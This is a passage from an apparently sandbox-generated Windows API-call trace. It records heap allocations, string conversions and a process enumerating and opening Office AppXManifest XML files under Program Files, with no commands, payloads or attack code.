(HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.118] AreFileApisANSI () returned 1 [0099.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75fa8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 105 [0099.119] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.119] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.119] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.119] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf982bd9c, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf98c485a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cAlternateFileName="APB63F~1.XML")) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d178 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d178 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0099.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89640 [0099.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0099.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89640 | out: hHeap=0x20000) returned 1 [0099.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.120] AreFileApisANSI () returned 1 [0099.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.120] AreFileApisANSI () returned 1 [0099.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 105 [0099.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.121] GetFileType (hFile=0x368) returned 0x1 [0099.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.121] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.121] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.122] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.122] CloseHandle (hObject=0x368) returned 1 [0099.122] AreFileApisANSI () returned 1 [0099.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 105 [0099.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.122] GetFileType (hFile=0x368) returned 0x1 [0099.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.122] CloseHandle (hObject=0x368) returned 1 [0099.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.123] AreFileApisANSI () returned 1 [0099.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml") returned 105 [0099.124] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00B4-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00b4-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf982bd9c, ftCreationTime.dwHighDateTime=0x1d47c33, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf98c485a, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.124] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cAlternateFileName="APB913~1.XML")) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88f00 [0099.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88b60 [0099.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88f00 | out: hHeap=0x20000) returned 1 [0099.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b60 | out: hHeap=0x20000) returned 1 [0099.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.125] AreFileApisANSI () returned 1 [0099.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.125] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.125] AreFileApisANSI () returned 1 [0099.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml") returned 105 [0099.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft 